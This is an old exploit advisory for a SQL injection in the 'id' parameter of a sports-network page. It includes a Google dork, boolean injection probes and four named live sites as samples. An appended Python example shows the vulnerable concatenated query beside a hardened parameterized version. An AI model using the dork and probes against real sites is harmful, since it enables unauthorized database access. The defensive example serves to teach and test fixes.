Iran Sports Network SQL Injection
Posted on 22 December 2011
############################### HUT CNIS #############################
# Exploit Title: Iran sports network SQL INJECTION Vulnerability
# Date: [2011/10/19]
# Author: S.Azadi
# Google Dork: inurl:d.asp site:.ir
# Vulnerability Type: SQL Injection
# Version: All versions
#---------------------------------------------------------------------

Technical Details:

- SQL INJECTION:
  There is a SQLI vulnerability in the id parameter of the d.asp page.

  http://sitename/d.asp?id=[SQLI]

PoC:
  http://sitename/d.asp?id=25928 and 1=0;--
  http://sitename/d.asp?id=25928 and 1=1;--

sample:
  http://www.irantriathlon.ir/d.asp?id=25928
  http://www.sporttehran.ir/d.asp?id=25921
  http://www.chesstehran.ir/d.asp?id=26403
  http://www.blindsports.ir/d.asp?id=25862

#
#
#
###########-HUT Center for Network and Information Security-################
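
Added example, not part of the original advisory and not the application's code: a Python/sqlite3 model of why the two PoC requests return different pages when the id value is concatenated into the query, next to a hardened lookup that validates and binds the value. The table, column and function names are assumptions, and the row is constructed sample data.

```python
import sqlite3

PROBE_TRUE = " and 1=1;--"   # suffixes taken from the advisory's PoC requests
PROBE_FALSE = " and 1=0;--"

def make_db():
    # Constructed stand-in database; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO items VALUES (25928, 'constructed sample row')")
    return db

def lookup_vulnerable(db, raw_id):
    # The flaw class the advisory reports: the id value is concatenated into
    # the SQL text, so "and 1=0" becomes part of the WHERE clause.
    return db.execute("SELECT title FROM items WHERE id = " + raw_id).fetchall()

def lookup_hardened(db, raw_id):
    # Allow only a plain decimal id, then bind it instead of concatenating.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a decimal integer")
    return db.execute("SELECT title FROM items WHERE id = ?",
                      (int(raw_id),)).fetchall()

def differs_on_boolean_probe(db, lookup, base_id):
    # Regression check: True when the two PoC requests get different results,
    # which is the signal that the parameter is being parsed as SQL.
    results = []
    for suffix in (PROBE_TRUE, PROBE_FALSE):
        try:
            results.append(lookup(db, base_id + suffix))
        except ValueError:
            results.append("rejected")
    return results[0] != results[1]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable differs:", differs_on_boolean_probe(db, lookup_vulnerable, "25928"))
    print("hardened differs:", differs_on_boolean_probe(db, lookup_hardened, "25928"))
```

The same differential check can be kept as a regression test against a site's own staging copy after the fix is deployed.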